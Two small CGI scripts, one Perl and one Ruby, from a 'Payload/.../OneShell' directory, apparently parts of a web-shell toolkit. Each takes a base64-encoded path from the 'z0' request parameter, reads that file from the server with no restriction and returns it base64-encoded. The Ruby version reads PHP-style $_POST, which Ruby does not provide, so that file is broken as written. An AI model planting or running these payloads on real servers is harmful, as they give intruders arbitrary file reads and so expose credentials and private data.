File: Payload/Perl/CGI/OneShell/file_image.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;

sub main {
    my $q = CGI->new;
    my $z0 = $q->param('z0') // '';

    my $sz_file_path = decode_base64($z0);

    my $ab_image_data = '';
    
    if (open(my $fh, '<', $sz_file_path)) {
        binmode($fh);
        
        local $/;
        $ab_image_data = <$fh>;
        
        close($fh);
    } else {
        return 'ERROR://Unable to open file.';
    }

   
    return encode_base64($ab_image_data, '');
}

print main();

File: Payload/Ruby/CGI/OneShell/file_image.rb
require 'base64'

def main
  sz_file_path = Base64.decode64($_POST['z0'].to_s)

  begin
    ab_image_data = File.binread(sz_file_path)
    print Base64.strict_encode64(ab_image_data)
  rescue => e
    print 'ERROR://Unable to open file.'
  end
end

main